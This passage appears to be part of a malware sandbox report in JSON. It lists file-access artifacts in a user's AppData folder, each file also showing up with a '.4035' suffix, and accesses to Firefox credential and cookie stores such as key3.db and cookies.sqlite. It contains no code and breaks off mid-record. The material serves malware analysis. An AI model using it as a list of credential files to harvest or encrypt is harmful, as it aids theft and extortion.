7lfsqb0g\\appdata\\roaming\\eefzam7d2yaf.mkv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\EEfzaM7d2YAF.mkv", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\eefzam7d2yaf.mkv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\ezu8il U5Yn6C.m4a.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\ezu8il u5yn6c.m4a.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\ezu8il U5Yn6C.m4a", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\ezu8il u5yn6c.m4a", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\fKtkyR 1-OP.mp4.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\fktkyr 1-op.mp4.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\fKtkyR 1-OP.mp4", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\fktkyr 1-op.mp4", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\i1LzIzrV0t.gif.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\i1lzizrv0t.gif.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\i1LzIzrV0t.gif", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\i1lzizrv0t.gif", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\jhB5.pdf.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\jhb5.pdf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\jhB5.pdf", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\jhb5.pdf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\JT0 nHyxkAPSaoLmKv0R.flv.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\jt0 nhyxkapsaolmkv0r.flv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\JT0 nHyxkAPSaoLmKv0R.flv", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\jt0 nhyxkapsaolmkv0r.flv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\K28I44Cu.gif.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\k28i44cu.gif.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\K28I44Cu.gif", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\k28i44cu.gif", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\K9OSgOmlj6mb.wav.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\k9osgomlj6mb.wav.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\K9OSgOmlj6mb.wav", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\k9osgomlj6mb.wav", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\ktjahCujmY.avi.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\ktjahcujmy.avi.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\ktjahCujmY.avi", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\ktjahcujmy.avi", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\kyIh4_jik6uQrR9hn.csv.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\kyih4_jik6uqrr9hn.csv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\kyIh4_jik6uQrR9hn.csv", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\kyih4_jik6uqrr9hn.csv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\MGacSuRE6 J9_.xlsx.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mgacsure6 j9_.xlsx.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\MGacSuRE6 J9_.xlsx", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mgacsure6 j9_.xlsx", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\mMlPxJAH5t3ZDP-AfXP.bmp.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mmlpxjah5t3zdp-afxp.bmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\mMlPxJAH5t3ZDP-AfXP.bmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mmlpxjah5t3zdp-afxp.bmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\oFWyT_.jpg.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\ofwyt_.jpg.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\oFWyT_.jpg", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\ofwyt_.jpg", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\QOQ-s.wav.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\qoq-s.wav.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\QOQ-s.wav", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\qoq-s.wav", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\tqQHus T.bmp.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\tqqhus t.bmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\tqQHus T.bmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\tqqhus t.bmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\u-tFp_dSKAw4.swf.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\u-tfp_dskaw4.swf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\u-tFp_dSKAw4.swf", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\u-tfp_dskaw4.swf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\UbiKXV.mp4.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\ubikxv.mp4.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\UbiKXV.mp4", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\ubikxv.mp4", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\ud83q.m4a.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\ud83q.m4a.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\ud83q.m4a", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\ud83q.m4a", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\uTyOJB3M3.jpg.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\utyojb3m3.jpg.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\uTyOJB3M3.jpg", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\utyojb3m3.jpg", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Vzxp5zim2Nc.mp3.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\vzxp5zim2nc.mp3.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Vzxp5zim2Nc.mp3", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\vzxp5zim2nc.mp3", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Wgrgh-5PaoXJURuexKk.mkv.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\wgrgh-5paoxjuruexkk.mkv.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Wgrgh-5PaoXJURuexKk.mkv", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\wgrgh-5paoxjuruexkk.mkv", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\z8sSR5 Fp7wKkj1aRuZ.bmp.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\z8ssr5 fp7wkkj1aruz.bmp.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\z8sSR5 Fp7wKkj1aRuZ.bmp", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\z8ssr5 fp7wkkj1aruz.bmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\zEsTq08NWkN.ods.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\zestq08nwkn.ods.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\zEsTq08NWkN.ods", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\zestq08nwkn.ods", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\addons.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\addons.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\addons.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\addons.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\cert8.db.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\cert8.db.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\cert8.db", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\cert8.db", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\compatibility.ini.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\compatibility.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\compatibility.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\compatibility.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\content-prefs.sqlite.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\content-prefs.sqlite.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\content-prefs.sqlite", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\content-prefs.sqlite", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\cookies.sqlite.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\cookies.sqlite.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\cookies.sqlite", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\cookies.sqlite", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\downloads.sqlite.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\downloads.sqlite.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\downloads.sqlite", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\downloads.sqlite", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\extensions.ini.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\extensions.ini.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\extensions.ini", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\extensions.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\extensions.sqlite.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\extensions.sqlite.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\extensions.sqlite", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\extensions.sqlite", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\healthreport.sqlite.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\healthreport.sqlite.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\healthreport.sqlite", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\healthreport.sqlite", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\key3.db.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\key3.db.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\key3.db", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\key3.db", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\localstore.rdf.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\localstore.rdf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\localstore.rdf", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\localstore.rdf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\marionette.log.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\marionette.log.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\marionette.log", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\marionette.log", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\mimeTypes.rdf.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\mimetypes.rdf.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\mimeTypes.rdf", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\mimetypes.rdf", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\permissions.sqlite.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\permissions.sqlite.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\permissions.sqlite", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\permissions.sqlite", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\places.sqlite.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\places.sqlite.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\places.sqlite", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\places.sqlite", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\pluginreg.dat.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\pluginreg.dat.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\pluginreg.dat", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\pluginreg.dat", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\prefs.js.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\prefs.js.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\prefs.js", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\prefs.js", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\search.json.4035", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\search.json.4035", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\search.json", "hashes": [], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\search.json", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\secmod.db.4035", "hashes": [], "norm_filename": 